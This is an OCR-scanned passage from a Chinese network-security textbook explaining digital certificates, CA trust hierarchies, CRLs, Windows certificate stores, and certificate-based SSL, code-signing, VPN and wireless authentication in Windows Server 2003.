。 有 效 期 (证 书 被 视 为 有 效 的 时 间 范 围 ); 

。 颁发 者 标识 信息 

。 颁发 者 的 数字 签名 ,此 签名 证 明 主题 公 钥 与 主题 标识 信息 之 间 绑 定 的 有 效 性 。 

数字 签名 是 邮件 ,文件 或 其 他 数字 编码 信息 的 创作 者 用 来 将 他 们 的 身份 绑 定 到 信息 的 
方法 。 数 字 签 名 信息 的 过 程 中 需要 将 此 信息 以 及 发 件 人 保存 的 一 些 机 密 信息 转换 成 称 为 签 
名 的 标记 。 数 字 签 名 在 公 钥 环境 中 使 用 ,它们 提供 不 可 否认 性 和 完整 性 服务 。 

证 书 只 在 该 证 书 指定 的 时 间 段 内 有 效 。 每 个 证 书包 含有 时 间 的 开始 和 结束 日 期 ,这 两 
个 日 期 设置 了 有 效 期 。 一 旦 超过 证 书 的 有 效 期 ,已 过 期 证 书 的 主题 必须 请 求 新 的 证 书 。 

颁发 者 可 通过 可 以 吊销 证 书 来 撤销 证 书 中 插入 的 绑 定 。 颁 发 者 CA 维护 一 个 证 书 吊销 
列表 (CRL) ,此 列表 列 出 已 吊销 的 证 书 , 程 序 在 检查 任何 给 定 证 书 的 有 效 性 时 可 以 使 用 此 
列表 。 

证 书 的 主要 优点 之 一 是 : 对 于 把 必须 进行 身份 验证 作为 访问 必要 条 件 的 单独 主题 , 主 
机 不 再 需要 为 它们 维护 密码 集合 。 相 反 主 机 只 对 证 书 颁发 者 建立 信任 。 

当主 机 (如 安全 的 Web 服务 器 ) 指 定 颁 发 者 作为 可 信 根 颁发 机 构 时 ,主机 隐 含 信任 颁 
发 者 用 来 建立 它 所 颁发 证 书 的 绑 定 策略 。 实 际 上 ,主机 信任 颁发 者 已 经 验证 了 证 书 主题 
的 身份 。 通 过 将 颁发 者 自己 签名 的 证 书 放 入 主机 计算 机 的 可 信任 CA 证 书 存储 区 中 , 主 
机 将 颁发 者 指定 为 可 信任 颁发 机 构 。 证 书 存储 区 是 Windows 公 钥 基础 结构 (Public Key 
Infrastructure,PKI) 是 用 户 存储 其 证 书 .CRL 和 证 书信 任 列表 的 永久 区 域 。 

只 有 当中 间 CA 或 从 属 CA 具有 自 可 信任 CA 的 有 效 证 书 路 径 时 ,这 两 种 CA 才 可 信 。 
证 书 路 径 可 以 定义 为 完整 信任 链 ( 包 含 来 自 可 信 CA 的 证 书 ) ,该 链 的 起 点 为 特定 的 证 书 , 终 
点 为 证 书 层次 结构 中 的 根 CA。 

当 用 户 信任 CA 时 ,意味 着 用 户 相 信 CA 在 评估 证 书 请 求 时 采用 了 正确 的 策略 并 拒绝 
将 证 书 发 给 任何 不 符合 这 些 策略 的 实体 。 另 外 ,用 户 相信 CA 会 通过 发 布 最 新 CRL 吊销 不 
再 被 视 为 有 效 的 证 书 。CRL 在 过 期 之 前 一 直 有 效 。 所 以 即使 CA 发 布 新 CRL( 此 CRL 列 
出 了 新 吊销 的 证 书 ), 具 有 旧 CRL 客户 端 也 不 会 查找 或 检索 新 的 CRL ,直到 旧 CRL 过 期 或 
删除 。 如 果 有 必要 ,客户 端 可 以 使 用 CA 网 页 手动 检索 最 新 的 CRL 。 
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对 于 使 用 Windows. NET 2003 的 用 户 , 当 用 户 拥有 可 信 根 CA 存储 区 中 的 根 证 书 副 
本 ,并 拥有 有 效 证 书 路 径 (意味 着 证 书 路 径 中 没有 任何 证 书 已 吊销 或 已 超出 有 效 期 ) 时 , 则 对 
CA 建立 信任 。 

如 果 用 户 的 单位 使 用 Active Directory, 则 对 于 单位 的 CA 的 信任 ,通常 根据 系统 管理 
员 所 做 的 决定 和 设置 自动 建立 。 

用 户 应 该 熟悉 的 有 关 概 念 是 证 书 存储 区 继承 。 如 果 将 根 CA 证 书 放 在 计算 机 的 可 信任 
CA 存储 区 或 企业 信任 存储 区 中 , 则 任何 计算 机 用 户 将 会 在 他 们 自己 的 可 信任 CA 存储 区 
或 企业 信任 存储 区 中 看 到 此 证 书 ,虽然 根 证 书 实际 位 于 计算 机 的 存储 区 中 。 本 质 上 ,用 户 将 
信任 他 们 的 计算 机 所 信任 的 任何 CA。 证 书 存储 区 继承 不 反 向 工作 ,也 就 是 计算 机 不 继承 
用 户 可 信任 CA 存储 区 和 企业 信任 存储 区 中 的 证 书 。 

如 果 用 户 的 单位 使 用 随 Windows Server 2003 系列 安装 的 证 书 服务 版 本 来 运行 其 CA， 
则 CA 是 企业 类 型 或 独立 类 型 。 

企业 CA 依赖 现 有 的 Active Directory。 可 以 使 用 证 书 请 求 向 导 ( 从 证 书 管理 单元 中 
启动 此 向 导 ) 以 及 CA 网 页 来 从 企业 CA 请 求证 书 。 根据 已 配置 准备 颁发 的 证 书 以 及 请 
求 者 的 安全 权限 ,企业 CA 向 请 求 者 提供 不 同 种 类 的 证 书 。 企业 CA 使 用 Active Directory 
中 的 可 用 信息 帮助 验证 请 求 者 的 身份 。 企 业 CA 向 Active Directory 以 及 共享 目录 发 布 
其 CRL。 

对 于 用 户 而 言 ,独立 CA 比 企业 CA 的 自动 程度 差 一 些 ,因为 它 不 依赖 Active Directory 
的 使 用 。 上 默认 情况 下 ,用 户 只 能 使 用 网 页 从 独立 CA 请 求证 书 。 不 使 用 Active Directory 的 
独立 CA 通常 要 请 求证 书 请 求 者 提供 更 完整 的 标志 信息 。 独 立 CA 的 CRL 可 以 从 共享 文 
件 夹 或 从 Active Directory( 如 果 有 的 话 ) 获 得 。 

证 书生 存 周 期 包括 下 列 事件 。 

。 安装 的 CA 以 及 向 它们 颁发 的 证 书 。 

。 CA 颁发 的 证 书 。 
(根据 需要 ?吊销 的 证 书 。 
续 期 的 或 过 期 的 证 书 。 
续 订 的 或 过 期 的 CA 证 书 。 

通常 需要 定义 证 书生 存 周 期 ,以 便 要 求 定 期 续 订 颁发 的 证 书 。 颁 发 的 证 书 在 吊销 、 
过 期 或 者 颁发 CA 不 可 用 之 前 ,可 以 循环 续 订 。 每 个 CA 可 以 通过 一 些 证 书 续 订 进行 循 
环 颁发 ,直到 CA 过 期 。 那 时 CA 可 由 于 其 密 钥 不 再 可 用 而 废止 ,也 可 使 用 新 的 密 钥 对 再 
次 续 订 。 

用 户 需 要 定义 满足 业务 目标 和 安全 需求 的 证 书生 存 周 期 。 用 户 选择 的 生存 周期 取决 于 
以 下 因素 。 

@D CA 以 及 颁发 的 证 书 的 私 钥 长 度 ,通常 密 钥 越 长 ,支持 的 证 书 有 效 期 限 和 密 钥 有 效 期 
限 越 长 。 

四 加 密 服 务 提供 程序 (CSP) 提 供 的 安全 性 。 通常 基 于 硬件 的 CSP 比 基 于 软件 的 CSP 
更 不 易 受 到 攻击 ,因此 支持 的 证 书 有 效 期 限 和 密 钥 有 效 期 限 更 长 。 


二 
络 与 信息 安全 基础 


@ 用 于 加 密 操作 的 技术 强度 。 一 般 而 言 ,加 密 技 术 越 难 破解 ,所 支持 的 证 书 有 效 期 限 


越 长 。 

@ 为 CA 及 其 私 钥 提供 的 安全 性 。 一 般 而 言 ,CA 及 其 私 钥 物 理 上 越 安 全 ,CA 有 效 期 
限 越 长 。 

@@ 为 颁发 的 证 书 及 其 私 钥 提供 的 安全 性 。 例 如 ,智能 卡 上 存储 的 私 钥 可 以 视 为 比 本 地 
硬盘 上 作文 件 存储 的 私 钥 更 安全 。 


@ 攻击 风险 。 攻 击 风险 取决 于 用 户 的 网 络 安全 性 `CA 信任 链 所 保护 的 网 络 资源 的 价 
值 以 及 启动 攻击 的 成 本 。 

@ 用 户 对 证 书 用 户 的 信任 度 。 一 般 而 言 ,信任 越 低 , 需 要 的 生存 周期 和 密 钥 有 效 期 越 
短 。 例 如 ,用 户 对 临时 用 户 的 信任 程度 可 能 比 对 一 般 业 务 用 户 低 , 所 以 颁发 的 临时 用 户 证 书 
的 有 效 期 限 较 短 ,用 户 可 能 还 需要 对 临时 用 户 证 书 的 续 订 进行 更 严格 的 控制 。 

@ 用 户 愿 意 为 证 书 续 订 和 CA 续 订 贡献 的 管理 努力 程度 。 例 如 ,要 降低 续 订 CA 所 需 
的 管理 努力 ,可 以 为 证 书信 任 层次 结构 指定 更 长 更 安全 的 有 效 期 限 。 

@ 用 户 希望 CA 和 颁发 的 证 书 被 信任 多 长 时 间 。 证 书 和 私 钥 的 有 效 期 越 长 ,安全 威胁 
的 风险 和 可 能 性 越 大 。 

四 用 户 应 该 定义 将 业务 目标 与 安全 需求 进行 实际 平衡 的 证 书生 存 周期 。 过 短 的 生 
存 周期 会 导致 维护 生存 周期 所 需 的 管理 努力 大 量 增长 。 过 长 的 生存 周期 会 增加 安全 
威胁 。 
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Windows Server 2003 标准 版 Windows Server 2003 企业 版 和 Windows Server 2003 
数据 处 理 中 心 版 在 需要 证 书 的 计算 机 或 设备 上 存储 证 书 , 如 果 有 用 户 需 要 通过 证 书 访问 的 
服务 器 , 则 在 用 户 用 来 请 求证 书 的 计算 机 或 设备 上 存储 证 书 。 存 储 位 置 称 为 证 书 存储 区 。 
证 书 存储 区 通常 有 大 量 证 书 , 这 些 证 书 可 能 由 许多 不 同 的 CA 颁发 。 

可 以 根据 颁发 证 书 的 用 途 或 通过 使 用 它们 的 逻辑 存储 类 别 ,为 用 户 、 计 算 机 或 服务 显示 
证 书 存储 区 。 当 按 证 书 存储 类 别 显 示 证 书 时 ,还 可 以 选择 显示 物理 存储 区 ,从 而 显示 证 书 存 
储 的 层次 结构 。 

如 果 用 户 有 进行 证 书 操作 的 权限 , 则 可 以 从 证 书 存储 区 中 的 任何 文件 夹 导入 或 导出 证 
书 。 另 外 ,如 果 与 证 书 相关 的 私 钥 标 记 为 可 以 导出 , 则 可 以 将 证 书 和 私 钥 都 导出 。 

Windows 还 可 以 将 证 书 发 布 到 Active Directory 中 。 在 Active Directory 中 发 布 证 书 
使 所 有 具有 适当 权限 的 用 户 或 计算 机 可 以 根据 需要 检索 证 书 。 

可 以 按 用 途 或 逻辑 存储 区 显示 证 书 , 如 表 3. 1 所 示 。 按 逻辑 存储 区 显示 证 书 是 证 书 的 
默认 设置 。 

当 用 户 查看 逻辑 存储 区 模式 下 某 一 证 书 存储 区 的 内 容 时 ,偶尔 会 看 到 在 存储 区 中 有 同 
一 证 书 的 两 个 副本 。 发 生 此 情况 的 原因 是 同一 证 书 存储 在 一 个 逻辑 存储 区 下 的 不 同 物理 存 
储 区 中 。 当 多 个 物理 证 书 存储 区 的 内 容 组 合成 一 个 逻辑 存储 区 视图 时 ,会 显示 同一 证 书 的 
两 个 实例 。 
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表 3.1 Windows 证 书 逻 辑 存储 区 和 用 途 容 器 


显示 依据 文件 夹 名 内 容 
区 与 用 户 有 访问 权 的 私 钥 相关 的 证 书 。 这 些 证 书 已 经 颁发 给 用 户 , 或 
者 颁发 给 为 用 户 管理 证 书 的 计算 机 或 服务 器 
隐 式 可 信 CA。 包括 第 三 方 根 CA 存储 区 中 的 所 有 证 书 以 及 来 自用 
了 户 的 单位 和 Microsoft 的 根 证 书 。 如 果 用 户 是 管理 员 ,而 且 想 要 为 
根 证 书 颁发 Windows . NET Active Directory 域 中 的 所 有 计算 机 将 第 三 方 CA 证 
书 添加 到 此 存储 区 , 则 可 以 使 用 组 策略 将 可 信任 证 书 分 发 到 用 户 的 
计算 机 
i 证 书信 任 列表 的 容器 。 证 书信 任 列表 提供 信任 来 自 其 他 单位 的 自 答 
区 名 根 证 书 以 及 限制 信任 这 些 证 书 的 机 制 
i 证 书 颁 发 | 向 发 给 从 属 CA 的 证 书 
高 站 次 颁发 给 明显 可 信 的 个 人 或 最 终 实体 的 证 书 。 大 多 数 情况 下 ,这 些 是 
区 一 自 签名 证 书 或 在 应 用 程序 (如 Microsoft Outlook) 中 明显 可 信 的 证 书 
颁发 给 隐 式 可 信 的 个 人 或 最 终 实体 的 证 书 。 这 些 证 书 必须 是 可 信 证 
书 层次 结构 的 一 部 分 。 大 多 数 情 况 下 ,这些 证 书 经 过 缓存 ,用 于 诸如 
加 密 文件 系统 (EFS) 之 类 的 服务 ,在 这 些 服务 中 ,证 书 用 于 创建 对 加 
密 文件 进行 解密 的 授权 
可 信 发 布 者 来 自 软件 限制 策略 所 信任 的 CA 的 证 书 
这 些 是 用 户 已 经 明确 决定 不 信任 的 证 书 , 表 示 不 信任 的 方式 有 , 使 
不 允许 的 证 书 用 软件 限制 策略 ,或 者 在 通过 邮件 或 Web 浏览 器 提供 决定 时 选择 不 
信任 该 证 书 
a 来 自 除 Microsoft 和 用 户 的 单位 之 外 的 其 他 CA 的 可 信 根 证 书 
证 书 登 记 请求 待定 的 或 已 被 拒绝 的 证 书 请 求 
a 与 用 户 对 象 相关 且 在 Active Directory 中 发 布 的 证 书 
服务 器 身份 验证 ”| 服务 器 程序 用 来 向 客户 端 验证 其 自身 身份 的 证 书 
客户 端 身份 验证 “| 客户 端 程序 用 来 向 服务 器 验证 其 自身 身份 的 证 书 
代码 签名 与 用 来 对 活动 内 容 进 行 签名 的 密 钥 对 相关 的 证 书 
全 安全 电子 邮件 与 用 来 对 电子 邮件 进行 签名 的 密 钥 对 相关 的 证 书 
对 文件 系统 加 密 | 与 密 钥 对 相关 的 证 书 ,使 用 此 密 铜 对 ,可 以 对 EFS 加 密 和 解密 数据 
时 所 使 用 的 对 称 密 钥 进行 加 密 和 解密 
双人 与 密 钥 对 相关 的 证 书 , 使 用 此 密 钥 对 ,可 以 对 恢复 EFS 所 加 密 的 数 
据 时 使 用 的 对 称 密 钥 进行 加 密 和 解密 
3.13 证 书 用 途 


可 以 为 各 种 功能 颁发 证 书 ,这 些 功 能 有 : Web 用 户 身份 验证 ,Web 服务 器 身份 验证 、 安 
全 电子 邮件 (使 用 安全 /多 用 途 Internet 邮件 扩展 一 一 S/MIME)、 Internet 协议 安全 
(IPSec) ,传输 层 安全 性 (TLS) 以 及 代码 签名 。Microsoft 公司 开发 出 许多 支持 证 书 的 应 用 
程序 : 例如 Outlook 和 Outlook Express、Internet 信息 服务 (JIS) 以 及 Internet Explorer 
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(IE)。 表 3.2 列 出 了 最 常见 的 证 书 应 用 程序 概述 。 
表 3.2 数字 证 书 应 用 程序 


应 用 程序 使 用 

安全 电子 邮件 安全 电子 邮件 客户 端 使 用 证 书 确保 电子 邮件 的 完整 性 并 对 电子 邮件 
进行 加 密 保护 

安全 Web 通信 Web 服务 器 可 以 对 Web 通信 的 客户 端 进行 身份 验证 (使 用 客户 端 证 
书 ) 并 提供 经 过 加 密 保护 的 Web 通信 (使 用 服务 器 证 书 ) 

安全 网 站 IIS 网 站 可 以 映射 客户 端 证 书 ,以 便 对 用 户 进行 身份 验证 ,从 而 控制 
网 站 访问 权限 

软件 文件 的 数字 签名 代码 签名 工具 使 用 证 书 来 对 软件 文件 进行 数字 签名 ,从 而 提供 对 原 
始 文件 的 保护 和 确保 数据 的 完整 性 

本 地 网 络 智能 卡 身份 验证 当 用 户 登 录 网 络 时 ,Kerberos 登录 协议 可 以 使 用 智能 卡 上 存储 的 证 
书 和 私 钥 对 网 络 用 户 的 身份 进行 验证 


远程 访问 智能 卡 身份 验证 当 用 户 登录 网 络 时 ,运行 “路 由 和 远程 访问 ”服务 的 服务 器 可 以 使 用 
智能 卡 上 存储 的 证 书 和 私 钥 对 网 络 用 户 进行 身份 验证 

IPSec 身份 验证 IPSec 可 以 使 用 证 书 对 IPSec 通信 的 客户 端 进行 身份 验证 

EFS 恢复 代理 使 用 恢复 代理 证 书 , 可 以 恢复 其 他 用 户 加 密 的 EFS 文件 


为 了 建立 证 书 层次 结构 ,证书 还 可 以 从 一 个 CA 颁发 给 另 一 个 CA。CA 是 一 个 实体 ， 
负责 建立 和 保证 属于 主题 (通常 是 用 户 或 计算 机 ) 或 其 他 CA 的 公 钥 真实 性 。CA 的 活动 可 
以 包括 : 通过 已 签名 的 证 书 将 公 钥 绑 定 到 识别 名 ,管理 证 书 序列 号 以 及 证 书 吊销 。 证 书 层 
次 结构 是 证 书 的 信任 模型 , 当 CA 之 间 建 立 父子 关系 时 ,在 此 模型 中 创建 证 书 路 径 。 最 可 信 
的 CA 称 为 根 颁发 机 构 , 位 于 证 书 层次 结构 的 顶端 且 拥 有 一 个 自 签名 证 书 。 

由 于 证 书 通 常用 来 建立 身份 和 为 安全 信息 交换 创建 信任 ,所 以 CA 可 以 向 个 人 、 设 备 
(如 计算 机 ) 和 计算 机 上 运行 的 服务 (如 IPSec) 颁 发 证 书 。 

在 有 两 个 实体 (如 设备 和 人 员 或 应 用 程序 和 服务 ) 尝 试 建立 身份 和 信任 的 情况 下 ,两 个 
实体 都 信任 同一 CA 的 事实 使 它们 之 间 可 以 建立 身份 和 信任 的 纽带 。 一 旦 证 书 主题 已 提供 
可 信 CA 颁发 的 证 书 , 则 试图 建立 信任 的 实体 可 以 继续 信息 交换 ,方法 是 : 将 证 书 主题 的 证 
书 存 储 在 其 自己 的 证 书 存储 区 中 ,并 在 适用 的 情况 下 使 用 证 书 中 包含 的 公 钥 对 会 话 密 钥 加 
密 , 以 确保 证 书 主题 的 所 有 后 续 通 信安 全 。 


1. 企业 中 的 证 书 用 途 


许多 大 型 企业 都 安装 有 自己 的 CA, 并 向 其 内 部 设备 ,服务 和 员工 颁发 证 书 ,以 创建 更 
安全 的 网 络 环境 。 有 的 企业 可 能 有 多 个 CA ,这些 CA 是 在 引导 到 根 CA 的 层次 结构 中 建立 
的 。 因 此 ,企业 的 员工 可 能 在 证 书 存储 区 中 有 各 种 内 部 CA 颁发 的 证 书 ,所 有 这 些 证 书 通过 
根 CA 的 证 书 路 径 共享 信任 连接 。 

颁发 给 个 人 的 证 书 , 个 人 可 以 从 商业 CA( 如 VeriSign) 购 买 证 书 ,以 便 发 送 加 密 的 或 经 
过 数字 签名 的 电子 邮件 来 保证 真实 性 。 

一 旦 用 户 购买 了 证 书 并 使 用 它 对 电子 邮件 进行 签名 , 则 邮件 收 件 人 可 以 验证 邮件 是 否 
在 传输 过 程 中 发 生 了 更 改 以 及 发 件 人 是 否 是 该 用 户 ( 当 然 ,假设 邮件 收 件 人 信任 为 用 户 颁发 
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证 书 的 CA)。 
2. SSL 证 书 


在 HTTPS( 通 过 SSL 的 HTTP) 身 份 验证 中 使 用 下 列 两 种 证 书 。 

@ 服务 器 证 书 : 此 证 书包 含有 关 服 务 器 (允许 客户 端 在 共享 敏感 信息 之 前 标志 此 服务 
器 ) 的 信息 。 

@ 客户 端 证 书 : 此 证 书包 含有 关 用 户 的 个 人 信息 ,并 向 服务 器 标志 SSL 客户 端 ( 发 
件 人 ) 。 

(1) 服务 器 证 书 

在 可 建立 SSL 连接 来 发 送 邮 件 之 前 , 收 件 人 计算 机 需要 一 个 服务 器 证 书 ,此 证 书 驻 留 
在 收 件 人 计算 机 的 “Internet 选项 ”1“ 证 书 ”1“ 证 书 ”|“ 个 人 ”存储 区 中 。 

从 CA 获取 的 服务 器 证 书 可 以 颁发 给 计算 机 的 NetBIOS 名 或 完整 DNS 名 称 。 当 发 送 
HTTPS 邮件 时 ,邮件 中 指定 的 目标 必须 与 收 件 人 服务 器 证 书 中 的 计算 机 名 相同 。 

位 于 收 件 人 方 的 IIS 必须 将 收 件 人 的 服务 器 证 书 发 送 给 发 件 人 ,以 进行 身份 验证 。 此 
服务 器 证 书包 含 CA 的 签名 、 收 件 人 的 公 钥 \ 有 关 收 件 人 的 其 他 信息 以 及 过 期 日 期 , 它 必须 
来 自发 件 人 信任 的 CA。 为 了 对 收 件 人 计算 机 进行 身份 验证 ,发 件 人 验证 它 是 否 信 任 CA， 
并 对 收 件 人 的 服务 器 证 书 中 的 签名 进行 确认 。 

当 发 件 人 计算 机 信任 CA( 例 如 VeriSign 或 Microsoft 证 书 服 务 ) 时 , 它 在 “Internet 选 
项 ?| 证 书 ”|* 证 书 ”|* 可 信和 根 证 书 颁发 机 构 ? 存 储 区 中 保存 来 自 该 CA 的 证 书 ( 此 证 书包 含 
CA 签名 和 公 钥 ) 。 

(2) 客户 端 证 书 

如 果 收 件 人 的 IIS 也 请 求 发 件 人 的 客户 端 证 书 来 进行 身份 验证 , 则 对 于 SSL 会 话 来 说 ， 
可 能 需要 其 他 可 选 安全 组 件 。 客 户 端 证 书 可 以 从 可 信 CA 获得 ,并 存储 在 客户 端的 个 人 证 
书 存储 区 中 。 

(3) 客户 端 证 书 映射 

启用 客户 端 证 书后 ,可 以 通过 将 客户 端 包 含 的 信息 与 Windows 用 户 相 关联 的 映射 方法 
来 进一步 保护 内 容 。 映 射 是 很 灵活 的 ,一 对 一 映射 将 单个 客户 端 证 书 映射 到 账户 ,多 对 一 映 
射 接受 满足 特定 条 件 的 众多 证 书 。 

当 满足 IIS 强加 的 所 有 条 件 时 ,发 件 人 (SSL 客户 端 ) 和 收 件 人 (SSL 服务 器 ) 创 建 和 交 
换 SSL 会 话 密 钥 ,此 密 钥 用 来 对 通过 SSL 连接 发 送 的 所 有 包 进 行 加 密 。 


3. 将 证 书 用 于 代码 签名 


证 书 还 可 以 用 来 验证 从 Internet 下 载 的 .从 公司 Intranet 安装 的 或 通过 CD-ROM 购买 
并 安装 在 计算 机 上 的 软件 代码 的 真实 性 。 未 签名 的 软件 (没有 有 效 软件 发 布 者 的 证 书 的 软 
件 ) 可 能 对 计算 机 和 计算 机 上 存储 的 信息 安全 构成 威胁 。 

当 使 用 来 自 可 信 CA 的 有 效 证 书 对 软件 签名 时 ,用 户 知道 软件 代码 未 被 算 改 ,可 以 安全 
地 安装 在 计算 机 上 。 在 软件 安装 过 程 中 ,会 提示 用 户 验 证 是 否 信任 软件 制造 商 ( 例 如 
Microsoft Corporation)。 用 户 还 可 以 使 用 提供 的 选项 选择 始终 信任 来 自 此 特定 软件 制造 
商 的 软件 内 容 。 如 果 选 择 信任 来 自制 造 商 的 内 容 , 其 证 书 会 存储 到 用 户 的 证 书 存储 区 中 ,其 
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产品 其 他 部 分 软件 的 安装 可 以 在 预定 义 为 信任 的 情况 下 进行 。 
4. 将 证 书 用 于 网 络 访问 身份 验证 


网 络 管理 员 可 以 使 用 证 书 进行 网 络 访问 身份 验证 ,因为 这 些 证 书 为 用 户 和 计算 机 的 身 
份 验 证 提供 了 很 高 的 安全 性 ,并 取消 了 基于 密码 且 安 全 性 低 的 身份 验证 方法 。 本 节 描 述 
Internet 验证 服务 (IAS) 和 虚拟 专用 网 络 (VPN) 服 务 器 如 何 使 用 可 扩展 的 身份 验证 协 
议 一 一 传输 层 安 全 (EAP-TLS) 、 受 保护 的 可 扩展 身份 验证 协议 (PEAP) 或 IPSec 来 对 许多 
类 型 的 网 络 访问 (包括 VPN 和 无 线 连接 ) 执 行 基于 证 书 的 身份 验证 。 

当 讨 论 身 份 验证 时 ,服务 器 定义 为 作为 TLS 端点 的 VPN 或 IAS 服务 器 。 可 以 配置 
VPN 服务 器 ,以 便 在 没有 IAS 的 情况 下 执行 网 络 访问 身份 验证 ; 或 者 当 用 户 在 网 络 上 有 多 
个 远程 身份 验证 拨号 用 户 服务 (RADIUS) 客 户 端 (如 VPN 服务 器 和 无 线 访问 点 ) 时 ,可 以 使 
用 IAS 进行 身份 验证 。 

有 两 个 身份 验证 方法 使 用 证 书 : EAP-TLS 和 PEAP。 这 两 个 方法 始终 使 用 证 书 进行 
服务 器 身份 验证 。 根 据 使 用 身份 验证 方法 配置 的 身份 验证 类 型 ,证 书 可 以 用 于 用 户 身份 验 
证 和 客户 端 身份 验证 。 下 面 是 一 些 网 络 访 问 身份 验证 的 证 书 部 署 示例 。 

(1) 远程 访问 VPN 连接 

使 用 EAP-TLS 作为 身份 验证 方法 的 VPN 服务 器 和 VPN 客户 端 之 间 的 第 二 层 隧 道 协 
议 (L2TP)/IPSec 或 点 对 点 隧道 协议 (PPTP) 连 接 。IPSec 在 客户 端 和 服务 器 之 间 使 用 计算 
机 证 书 进行 身份 验证 ,EAP-TLS 使 用 证 书 (来 自 智能 卡 或 用 户 的 本 地 证 书 存储 区 进行 用 
户 身 份 验证 。 在 证 书 的 增强 密 钥 用 途 (EKU) 扩 展 中 ,IAS 或 VPN 服务 器 证 书 必 须 包含 服 
务 器 身份 验证 功能 ,客户 端 计算 机 或 用 户 证 书 必须 包含 客户 端 身份 验证 用 途 。 

(2) 路 由 器 对 路 由 器 VPN 连接 

将 EAP-TLS 作为 身份 验证 方法 的 服务 器 之 间 专 用 或 按 需 拨号 连接 的 L2TP/IPSec 连 
接 。 两 个 服务 器 必须 具有 包含 EKU 扩展 中 的 服务 器 身份 验证 和 客户 端 身份 验证 用 途 的 
证 书 。 

(3) IEEE 802. 1X 无 线 或 切换 客户 端 

要 将 PEAP-EAP-MS-CHAPv2 配置 为 身份 验证 方法 . 需 在 客户 端 计算 机 上 启用 “验证 
服务 器 证 书 ” 选 项 。IAS 服务 器 证 书 EKU 扩展 包含 服务 器 身份 验证 功能 ,证 书 用 于 向 客户 
端 标识 服务 器 。 用 户 身 份 验证 通过 用 户 名 和 密码 来 完成 。 

(4) IEEE 802. 1X 无 线 或 切换 客户 端 

使 用 L2TP/IPSec, 且 将 带 有 证 书 的 EAP-TLS 配置 为 身份 验证 方法 。IAS 服务 器 证 书 
包含 EKU 扩展 中 的 服务 器 身份 验证 功能 ,以 便 向 客户 端 标 识 其 自身 ,而 客户 端 使 用 证 书 
(来 自 智能 卡 或 用 户 的 本 地 证 书 存储 区 ) 向 IAS 服务 器 标识 其 自身 (无 线 访问 点 配置 为 作为 
EAP 验证 者 的 IAS 服务 器 上 的 RADIUS 客户 端 ) 。 


5. 使 用 证 书 进行 L2TP/IPSec 身份 验证 


在 远程 访问 客户 端 和 服务 器 之 间 尝 试 L2TP/IPSec 连接 时 ,首先 执行 计算 机 身份 验证 。 
当 客 户 端 与 服务 器 之 间 建 立 了 安全 通道 后 ,用 户 身 份 验 证 和 授权 尝试 继续 进行 。 
IPSec 的 计算 机 身份 验证 是 使 用 预 共享 密 钥 或 计算 机 证 书 执行 的 。 推 荐 的 身份 验证 方 
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法 是 使 用 PKI 和 证 书 。 如 果 使 用 证 书 , 则 在 基于 L2TP/IPSec 的 VPN 连接 中 ,需要 计算 机 
证 书 才 能 在 Internet 密 钥 交换 (IKE) 协 商 过 程 中 建立 IPSec 信任 。 

为 了 让 运行 Windows. NET 的 VPN 服务 器 和 运行 Windows 2000 或 Windows XP 的 
VPN 客户 端 建立 对 L2TP/IPSecVPN 连接 的 信任 ,两 台 计 算 机 都 必须 拥有 同一 个 可 信和 企业 
根 CA 颁发 的 计算 机 证 书 。 当 两 台 计 算 机 拥有 并 交换 IPSec 协商 过 程 中 可 信任 CA 颁发 的 
证 书 时 ,它们 扩展 了 彼此 之 间 的 信任 ,建立 了 安全 关系 。 

当 在 VPN 客户 端 和 服务 器 之 间 尝 试 L2TP/IPSec VPN 连接 时 ,如 果 VPN 客户 端 证 书 
(来 自 智能 卡 或 本 地 计算 机 上 的 证 书 存储 区 ) 没 有 配置 为 具有 EKU 扩展 中 的 客户 端 身份 验 
证 用 途 , 且 VPN 服务 器 证 书 没有 配置 为 具有 EKU 扩展 中 的 服务 器 身份 验证 功能 , 则 计算 
机 身份 验证 会 失败 。IPSec 检查 客户 端 证 书 的 EKU 扩展 ,以 确定 客户 端 身 份 验证 用 途 对 象 
标志 符 是 否 存在 。 如 果 EKU 扩展 包含 客户 端 身份 验证 用 途 对 象 标志 符 , 则 IPSec 可 以 使 
用 证 书 进行 身份 验证 。 

虽然 终止 远程 用 户 连接 的 VPN 服务 器 只 需要 使 用 配置 为 具有 EKU 扩展 中 的 服务 器 
身份 验证 用 途 的 证 书 , 但 作为 与 男 一 个 VPN 服务 器 进行 VPN 连接 的 端点 则 需 分 别 启动 和 
终止 客户 端 和 服务 器 来 VPN 连接 。 所 以 这 些 服务 器 上 的 证 书 必须 同时 包含 EKU 扩展 中 
的 服务 器 身份 验证 用 途 和 客户 端 身份 验证 用 途 。 另 外 由 于 自动 选择 证 书 的 工作 方式 ,同一 
证 书 中 必须 包含 两 个 用 途 ( 服 务 器 身份 验证 和 客户 端 身份 验证 )。 自 动 选 择 证 书 可 以 为 
IPSec 提供 连接 到 可 信 企 业 根 CA 的 证 书 存储 区 中 的 任何 证 书 ,而 无 论证 书 中 包含 的 用 途 
是 什么 。 如 果 服 务 器 上 安装 了 两 个 证 书 (一 个 包含 客户 端 身份 验证 用 途 , 另 一 个 包含 服务 器 
身份 验证 用 途 ), 则 自动 选择 证 书 有 可 能 将 错误 的 证 书 用 于 身份 验证 。 例 如 ,可 能 需要 具有 
客户 端 身份 验证 用 途 的 证 书 ,但 是 通过 自动 选择 证 书 提供 的 证 书包 含 的 却 是 服务 器 身份 验 
证 用 途 的 证 书 。 在 此 情况 或 类 似 情况 下 ,计算 机 身份 验证 将 失败 。 


6. 基于 证 书 的 身份 验证 和 无 线 客 户 端 


对 于 无 线 客户 端 ( 带 有 无 线 网 络 适 配器 的 计算 设备 ,如 便携 式 计算 机 或 PDA) ,在 进行 
身份 验证 时 ,建议 使 用 具有 EAP-TLS 功能 的 PEAP、 智 能 卡 或 证 书 。 

IEEE 802. 1X 身份 验证 提供 对 802. 11 无 线 网 络 和 无 线 以 太 网 的 已 验证 身份 的 访问 。 
802. 1X 提供 对 安全 EAP 类 型 (如 使 用 智能 卡 或 证 书 的 TLS) 的 支持 。 可 以 使 用 各 种 方法 
配置 802. 1X 具有 EAP-TLS。 如 果 在 Windows XP Professional 客户 端 上 配置 了 “验证 服 
务 器 证 书 ” 选 项 , 则 客户 端 使 用 服务 器 的 证 书 对 服务 器 进行 身份 验证 。 可 以 使 用 来 自 客户 端 
证 书 存储 区 或 智能 卡 的 证 书 完成 客户 端 计算 机 和 用 户 身 份 验 证 ,提供 相互 的 身份 验证 。 

对 于 无 线 客户 端 ,可 以 使 用 PEAP-EAP-MS-CHAPv2 作为 身份 验证 方法 。PEAP- 
